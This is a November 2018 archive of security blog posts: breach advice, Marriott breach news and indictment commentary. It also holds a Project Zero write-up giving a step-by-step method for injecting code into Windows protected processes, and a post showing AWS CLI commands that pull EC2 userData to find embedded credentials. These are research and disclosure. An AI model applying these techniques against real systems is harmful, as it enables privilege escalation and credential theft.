Monthly Archives: November 2018

SaferVPN review: This newcomer is off to a good start

SaferVPN in brief:

  • P2P allowed: Netherlands server only
  • Business location: Tel Aviv, IL
  • Number of servers: 700
  • Number of country locations: 34
  • Monthly cost: $65.88 billed annually, or $78.96 for two years
  • VPN protocol: IKEv2 (default with OpenVPN as fallback)
  • Data encryption: AES-256
  • Data authentication: SHA-256
  • Handshake encryption: 2048-bit

Editor’s Note: This review was updated November 29, 2018 to reflect changes to infrastructure, improved speed scores, and a new overall review score.

To read this article in full, please click here

Affected by a Data Breach? 6 Security Steps You Should Take

It’s common for people to share their personal information with companies for multiple reasons. Whether you’re checking into a hotel room, using a credit card to make a purchase at your favorite store, or collecting rewards points at your local coffee shop, companies have more access to your data than you may think. While this can help you build relationships with your favorite vendors, what happens if their security is compromised?

A high-profile hotel and another popular consumer brand’s perks program recently experienced data breaches that exposed users’ personal information. If you think you were affected by one of these breaches, there are multiple steps you can take to help protect yourself from the potential side effects.

Check out the following tips if you think you may have been affected by a data breach, or just want to take extra precautions:

  • Change your password. Most people will rotate between the same three passwords for all of their personal accounts. While this makes it easier to remember your credentials, it also makes it easier for hackers to access more than one of your accounts. Try using a unique password for every one of your accounts or employ a password manager.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Update your privacy settings. Be careful with how much of your personal information you share online. Make sure your social media accounts and mobile apps are on private and use multi-factor authentication to prevent your accounts from being hacked.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Affected by a Data Breach? 6 Security Steps You Should Take appeared first on McAfee Blogs.

Are US hacker indictments more than Justice Theater?

Hacker indictments by U.S. Justice Department haven’t proven effective and now the Treasury Department is also getting in on the act with questionable sanctions.

In the past five months alone, the U.S. Department of Justice has indicted at least 30 foreign individuals in connection with various cyberattacks, but only three of those individuals were arrested and extradited to the U.S., which puts into question if legal action is little more than “justice theater,” akin to Bruce Schneier’s “security theater” put on by the likes of the TSA.

In July, special counsel Robert Mueller indicted 12 Russian intelligence officers in connection with the DNC and DCCC hacks; in September, one member of the North Korean Lazarus Group was indicted; in October, seven more Russian officers were indicted; and November saw eight Russian nationals indicted for running a massive botnet — three of whom are in custody — and two Iranians in connection to the SamSam ransomware.

Before this month, in order to find a foreign national that was indicted and detained — not considering his trial proceedings have begun — you have to go back to Aug. 2017 with Marcus Hutchins, aka MalwareTech, a British security researcher detained after attending Defcon 2017 in Las Vegas.

Along with the latest hacker indictment of two Iranian nationals, the Treasury Dept. designated two additional Iranian men for their role in exchanging the bitcoin earned in ransomware attacks into Iranian rial.

According to the Treasury Dept., a designation action means, “all property and interests in property of the designated persons that are in the possession or control of U.S. persons or within or transiting the United States are blocked, and U.S. persons generally are prohibited from dealing with them.”

However, considering the “property” in this context is a decentralized cryptocurrency, it’s unclear what — if anything — this action means in real world terms. Unlike assets held by a U.S. bank or bank in a friendly nation, a bitcoin wallet doesn’t fall under any authority’s jurisdiction.

Making the case worse for the Treasury Dept., neither bitcoin wallet had a meaningful balance at the time of the designation announcement. One of the wallets hadn’t seen activity since Dec. 2017 — until receiving two payments the day after the Treasury announcement — and the other had a balance equivalent to just over $3 as of Nov. 11, before receiving two payments each on the day of and the day after the announcements.

The two bitcoin wallets combined received a total of 5901.4 BTC while in use, but the value of that is difficult to calculate because of the high volatility of bitcoin prices over the past year and the owners of the wallets always being quick to send funds to other accounts. It’s possible the amount of bitcoin was worth tens of millions of U.S. dollars.

That’s tens of millions of dollars sent to dozens or hundreds of different accounts going back to 2013, and all but about $3 of which was gone before the Treasury Dept. announced any actions.

At least with the indictments, the DoJ can theoretically limit the travel of the individuals charged or seize assets in America. The Treasury Dept. has put sanctions on two men who most likely won’t be extradited, and are attempting to “block” property that was gone before any action was taken. That feels like peak justice theater.

The post Are US hacker indictments more than Justice Theater? appeared first on Security Bytes.

OSSEC For Website Security: PART II – Distributed Architectures Using Agents and Managers

This article assumes you already have OSSEC deployed. If you need a refresher, refer to the Part I of OSSEC for website security, written March 2013. OSSEC is popular open-source...

Read More

The post OSSEC For Website Security: PART II – Distributed Architectures Using Agents and Managers appeared first on PerezBox.

Hacker hijacks 50,000 printers to tell people to subscribe to PewDiePie

Over the course of this week, some printers have been printing out a strange message asking people to subscribe to PewDiePie's YouTube channel. The message appears to be the result of a simple exploit that allows printers to receive data over the internet, including print commands. A person with the online handle TheHackerGiraffe has claimed responsibility for the attack.

Via: The Verge

Source: TheHackerGiraffe

Marriott Hotels 4 Year Hack Impacts Half a Billion Guests!

A mammoth data breach was disclosed by hotel chain Marriott International today (30 Nov 18), with a massive 500 million customer records said to have been compromised by an "unauthorized party". 
Image result for marriott
The world's largest hotel group launched an internal investigation in response to a system security alert on 8th September 2018, and found an attacker had been accessing the hotel chain's "Starwood network" and customer personal data since 2014, copying and encrypting customer records. In addition to the Marriott brand, Starwood includes W Hotels, Sheraton, Le Méridien and Four Points by Sheraton. 

Image result for starwood
You are at risk if you have stayed at any of the above hotel brands in the last 4 years

The Marriott statement said for around 326 million of its guests, the personal information compromised included "some combination" of, name, address, phone number, email address, passport number, date of birth, gender and arrival & departure information. The hotelier also said encrypted payment card data was also copied, and it could not rule out the encryption keys to decrypt cardholder data had not been stolen.

The hotel giant said it would notify customers affected and offer some a fraud detecting service for a year for free, so I expect they will be making contact with myself soon. In the meantime, Marriott has launched a website for affected customers and a free helpline for concerned UK customers 0808 189 1065.

The UK ICO said it would be investigating the breach, and warned those who believe they are impacted to be extra vigilant and to follow the advice on the ICO website, and by the National Cyber Security Centre
. The hotel chain could face huge fines under the GDPR, and possibly a large scale class action lawsuit by their affected guests, which could cost them millions of pounds. 

What I really would like to know is why the hotel chain had retained such vast numbers of guest records post their stay. Why they held their customer's passport details and whether those encryption keys were stolen or not. And finally, why the unauthorised access went undetected for four years.

Tom Kellermann, Chief Cybersecurity Officer for Carbon Black, said "It appears there had been unauthorised access to the Starwood network since 2014, demonstrating that attackers will get into an enterprise and attempt to remain undetected. A recent Carbon Black threat report found that nearly 60% of attacks now involve lateral movement, which means attackers aren’t just going after one component of an organisation - they’re getting in, moving around and seeking more targets as they go."

The report also found that 50% of today’s attackers now use the victim primarily for island hopping. In these campaigns, attackers first target an organisation's affiliates, often smaller companies with immature security postures and this can often be the case during an M&A. This means that data at every point in the supply chain may be at risk, from customers, to partners and potential acquisitions.”

Jake Olcott, VP of Strategic Partnerships at BitSight, said "Following the breaking news today that Marriott’s Starwood bookings database has been comprised with half a billion people affected, it highlights the importance of organisations undertaking sufficient security posture checks to avoid such compromises. Marriott’s acquisition of Starwood in 2016 allowed it to utilise its Starwood customer database. Therefore, proactive due diligence during this acquisition period would have helped Marriott to identify the potential cybersecurity risks, and the impact of a potential breach".

“This is yet another example of why it is critical that companies perform cybersecurity analysts during the due diligence period, prior to an acquisition or investment. Traditionally, companies have approached cyber risk in acquisitions by issuing questionnaires to the target company; unfortunately, these methods are time consuming and reflect only a “snapshot in time” view.

“Understanding the cybersecurity posture of an investment is critical to assessing the value of the investment and considering reputational, financial, and legal harm that could befall the company. After an investment has been made, continuous monitoring is essential.”

Injecting Code into Windows Protected Processes using COM – Part 2

Posted by James Forshaw, Project Zero

In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.

As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.

Finding a New Target

My first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts link for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.

I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.

Path
Signing Level
C:\windows\system32\GenValObj.exe
Windows
C:\windows\system32\sppsvc.exe
Windows
C:\windows\system32\WerFaultSecure.exe
WindowsTCB
C:\windows\system32\SgrmBroker.exe
WindowsTCB

As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.

The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level though hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.

Digging into COM Remoting Internals

Communication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:


In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.

The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:

interface IObjectExporter {
  // ...
  error_status_t ResolveOxid(
    [in] handle_t hRpc,
    [in] OXID* pOxid,
    [in] unsigned short cRequestedProtseqs,
    [in] unsigned short arRequestedProtseqs[],
    [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
    [out, ref] IPID* pipidRemUnknown,
    [out, ref] DWORD* pAuthnHint
);

In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.

An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.

The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.


In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:

[uuid("00000134-0000-0000-c000-000000000046")]
interface IRundown : IUnknown {
   HRESULT RemQueryInterface(...);
   HRESULT RemAddRef(...);
   HRESULT RemRelease(...);
   HRESULT RemQueryInterface2(...);
   HRESULT RemChangeRef(...);
   HRESULT DoCallback([in] struct XAptCallback* pCallbackData);
   HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);
   HRESULT AcknowledgeMarshalingSets(...);
   HRESULT GetInterfaceNameFromIPID(...);
   HRESULT RundownOid(...);
}

This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):

struct XAptCallback {
 void* pfnCallback;
 void* pParam;
 void* pServerCtx;
 void* pUnk;
 void* iid;
 int   iMethod;
 GUID  guidProcessSecret;
};

HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {
 CProcessSecret::GetProcessSecret(&pguidProcessSecret);
 if (!memcmp(&pguidProcessSecret,
             &pCallbackData->guidProcessSecret, sizeof(GUID))) {
   if (pCallbackData->pServerCtx == GetCurrentContext()) {
     return pCallbackData->pfnCallback(pCallbackData->pParam);
   } else {
     return SwitchForCallback(
                  pCallbackData->pServerCtx,
                  pCallbackData->pfnCallback,
                  pCallbackData->pParam);
   }
 }
 return E_INVALIDARG;
}

This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.

What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.

Abusing DoCallback

We have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:

  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?

Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.

First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.

Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:

  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.

Using WerFaultSecure for its Original Purpose

Up to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?

The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.

However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.

There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:


We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.

After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:

Parameter
Description
/h
Enable secure dump mode.
/pid {pid}
Specify the Process ID to dump.
/tid {tid}
Specify the Thread ID in the process to dump.
/file {handle}
Specify a handle to a writable file for the unencrypted crash dump
/encfile {handle}
Specify a handle to a writable file for the encrypted crash dump
/cancel {handle}
Specify a handle to an event to indicate the dump should be cancelled
/type {flags}
Specify MIMDUMPTYPE flags for call to MiniDumpWriteDump

This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.

Putting it All Together

There’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.

Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.

Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.


Unfortunately looking at the code this won’t work, a cut down version is shown below:

HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {
 CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
 IOSTaskCompletion* inf;
 HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,
     NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));
 if (SUCCEEDED(hr)) {
   // Open process and disable PLM handling.
 }
}

The code passes the flag, CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way, the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.

However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.

What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:

  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?

Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.

The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements.

Wrapping Up

In conclusion to get arbitrary code execution inside a PP-WindowsTCB without administrator privileges process we can do the following:

  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.

That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Marriott Confirms Breach Impacts As Many As 500 Million Guests

Veracode Marriott Starwood Hotel Breach November 2018

Marriott International has disclosed that the guest reservation database of its Starwood division has been breached, affecting as many as 500 million guests. The company has also confirmed that there has been unauthorized access to the Starwood network since 2014.

According to a report from the BBC, for roughly 327 million guests, the attacker was able to access personally identifiable information including a combination of name, address, phone number, email address, passport number, account information, date of birth, and gender. In some cases, the compromised records also included encrypted credit card information. The company is still trying to determine whether or not the encryption keys have also been stolen.

In a statement, Marriott said that on Sept. 8 of this year, it received an alert from an internal security tool that an unauthorized user had attempted to access the Starwood database in the US. An investigation into the incident confirmed that an attacker had indeed copied and encrypted the information. Marriott was able to decrypt the information to confirm that the contents were from the Starwood guest reservation database.

While it is still unclear how the attackers penetrated the organization, Chris Wysopal, co-founder & CTO of Veracode, said that the breach could have gone undetected on the network for so long because attackers are getting better at making sure their attacks don’t contain indicators of compromise (IoC).

Marriott bought Starwood - which owns brands including the W Hotels, Sheraton, Le Méridien, and Four Points by Sheraton - in 2016 to create the largest hotel chain in the world. Marriott-branded hotels use a separate reservation system on a different network.

The incident has been reported to both law enforcement and regulatory authorities, and the UK's data regulator is investigating. While Marriott is headquartered in the US, it works with and hosts European citizens, so it must ensure that it meets GDPR compliance. It’s anticipated that Marriott International will receive a substantial penalty because of the size and scale of the breach. Wysopal said that given that this is one of the first major breaches under both GDPR and the new California Consumer Privacy Act, “it will be a bellwether for breaches to come.”

“On a scale of 1 to 10 and up, this is one of those No. 10 size breaches. There have only been a few of them of this scale and scope in the last decade,” Wysopal told AP in an interview.

Marriott is emailing guests affected by the breach and will not send emails with any attachments. Additionally, the company is offering its guests a free membership to WebWatcher, a personal information monitoring service, and is instructing guests to watch their loyalty accounts, change their passwords, and check credit card statements for unauthorized activities. An informational website and call center have also been set up to support guests during the investigation.

How to enable 2FA on Twitter with Authy, Google Authenticator or another Mobile Application

It’s been a long time since I have had to enable 2FA on Twitter and found the process completely infuriating. Twitter’s 2FA configuration uses SMS as the default option, this...

Read More

The post How to enable 2FA on Twitter with Authy, Google Authenticator or another Mobile Application appeared first on PerezBox.

AWS EC2 instance userData

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time. 


You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script. 

That's interesting right?!?!  so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
    "InstanceId": "i-0XXXXXXXX",
    "UserData": {
        "Value": "bm90IHRvZGF5IElTSVMgOi0p"}


anyway that can get tedious especially if the org has a ton of things running.  This is precisely the reason @cktricky and I built weirdAAL.  Surely no one would be sticking creds into things at boot time via shell scripts :-)


The module loops trough all the regions and any instances it finds and queries for the userData attribute.  Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

Playbook Fridays: OneMillion API Component

Using this Playbook Component, incident responders and analysts can check if a given domain exists on any lists of the most frequently visited hostnames

